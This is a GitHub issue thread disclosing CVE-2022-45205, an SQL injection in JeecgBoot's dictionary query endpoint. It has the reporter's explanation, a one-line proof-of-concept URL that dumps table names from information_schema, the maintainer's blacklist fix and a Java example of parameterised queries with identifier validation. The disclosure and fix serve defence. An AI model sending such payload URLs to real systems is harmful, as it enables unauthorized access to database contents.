
[CVE-2022-45205]/sys/dict/queryTableData is affected by sql injection #4128

Closed
azraelxuemo opened this issue Oct 25, 2022 · 2 comments

Comments

@azraelxuemo

azraelxuemo commented Oct 25, 2022

SysDictMapper.xml

queryDictTablePageList. You can see that no precompiling is performed.
(screenshot: 2022-10-25 15:24:58)

SysDictController.java

(screenshot: 2022-10-25 15:25:29)

SysDictServiceImpl.java

(screenshot: 2022-10-25 15:26:05)

vuln

There is no control over the user-supplied table, column, and database name, so an attacker can directly obtain all data.

poc

http://192.168.1.1:8088/jeecg-boot/sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA

MySQL background code

(screenshot: 2022-10-25 15:28:13)

result in the website

(screenshot: 2022-10-25 15:33:29)

pageSize controls the number of results, code and text control the column names you want, and table controls the table.

patch

Change to precompiled statements.
Verify the fields entered by the user.

@zhangdaiscott
Member

zhangdaiscott commented Oct 30, 2022

For this problem, we provide a table-name blacklist utility class. Sensitive tables, such as the user table, can be added to the configuration, and we will then check and reject illegal queries.

org\jeecg\common\util\security\AbstractQueryBlackListHandler.java

Just add this check:

    // reject dictionary codes whose table is on the blacklist before the query runs
    if (!dictQueryBlackListHandler.isPass(dictCode)) {
        return result.error500(dictQueryBlackListHandler.getError());
    }

Documentation:
http://doc.jeecg.com/3009695
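The following is an added example, not JeecgBoot's own code and not the AbstractQueryBlackListHandler referenced above. It covers both points raised in this thread: the reporter's suggested patch (precompiled statements plus validation of user-supplied fields) and the maintainer's table blacklist. Table and column names cannot be bound as JDBC parameters, so they are checked against a strict identifier pattern (no dots, so a schema-qualified name such as information_schema.tables is rejected) and a blacklist of sensitive tables, while the search value and page size are bound with "?". The class name SafeDictQuery, the blacklist contents, the identifier pattern and the pageSize cap are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Pattern;

// Added example, not JeecgBoot code: validated identifiers + bound values.
public class SafeDictQuery {

    // Plain identifiers only: no dots, quotes or spaces, so a schema-qualified
    // name like information_schema.tables never reaches the SQL string.
    private static final Pattern IDENTIFIER =
            Pattern.compile("^[A-Za-z_][A-Za-z0-9_]{0,63}$");

    // Hypothetical blacklist of sensitive tables; a real deployment would load
    // this from configuration, as the maintainer's handler does.
    private static final Set<String> TABLE_BLACKLIST = Set.of("sys_user", "sys_permission");

    private static final int MAX_PAGE_SIZE = 500;  // assumed upper bound for pageSize

    /** SQL text with "?" placeholders plus the values to bind, in order. */
    public static final class Query {
        public final String sql;
        public final List<Object> params;

        Query(String sql, List<Object> params) {
            this.sql = sql;
            this.params = Collections.unmodifiableList(params);
        }
    }

    /** Rejects anything that is not a bare identifier. */
    static String requireIdentifier(String name, String what) {
        if (name == null || !IDENTIFIER.matcher(name).matches()) {
            throw new IllegalArgumentException("illegal " + what + ": " + name);
        }
        return name;
    }

    public static Query build(String table, String textField, String codeField,
                              String keyword, int pageSize) {
        String t = requireIdentifier(table, "table");
        if (TABLE_BLACKLIST.contains(t.toLowerCase(Locale.ROOT))) {
            throw new IllegalArgumentException("table is not queryable: " + t);
        }
        String text = requireIdentifier(textField, "text field");
        String code = requireIdentifier(codeField, "code field");
        if (pageSize < 1 || pageSize > MAX_PAGE_SIZE) {
            throw new IllegalArgumentException("pageSize out of range: " + pageSize);
        }

        List<Object> params = new ArrayList<>();
        StringBuilder sql = new StringBuilder()
                .append("SELECT `").append(text).append("` AS text, `")
                .append(code).append("` AS code FROM `").append(t).append('`');
        if (keyword != null && !keyword.isEmpty()) {
            sql.append(" WHERE `").append(text).append("` LIKE ?");
            params.add("%" + keyword + "%");  // bound as a parameter, never concatenated
        }
        sql.append(" LIMIT ?");
        params.add(pageSize);
        return new Query(sql.toString(), params);
    }

    /** Binds the validated query to a PreparedStatement (needs a live Connection). */
    public static PreparedStatement prepare(Connection conn, Query q) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(q.sql);
        for (int i = 0; i < q.params.size(); i++) {
            ps.setObject(i + 1, q.params.get(i));
        }
        return ps;
    }

    public static void main(String[] args) {
        // Constructed input: an ordinary dictionary lookup is accepted.
        Query ok = build("demo_dict", "item_text", "item_value", "abc", 20);
        System.out.println(ok.sql + "  params=" + ok.params);

        // The schema-qualified name from the report and a blacklisted table are both rejected.
        for (String bad : new String[] {"information_schema.tables", "sys_user"}) {
            try {
                build(bad, "name", "id", null, 100);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

The identifier check is an allowlist on shape rather than a search for dangerous substrings, so it also stops quoting tricks that a blacklist alone would miss; the blacklist then adds the policy layer (which tables may be exposed through a dictionary lookup at all). Quoting identifiers with backticks is MySQL syntax; other databases use double quotes.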

@zhangdaiscott
Member

Handled.

@azraelxuemo azraelxuemo changed the title /sys/dict/queryTableData is affected by sql injection [CVE-2022-45205]/sys/dict/queryTableData is affected by sql injection Dec 1, 2022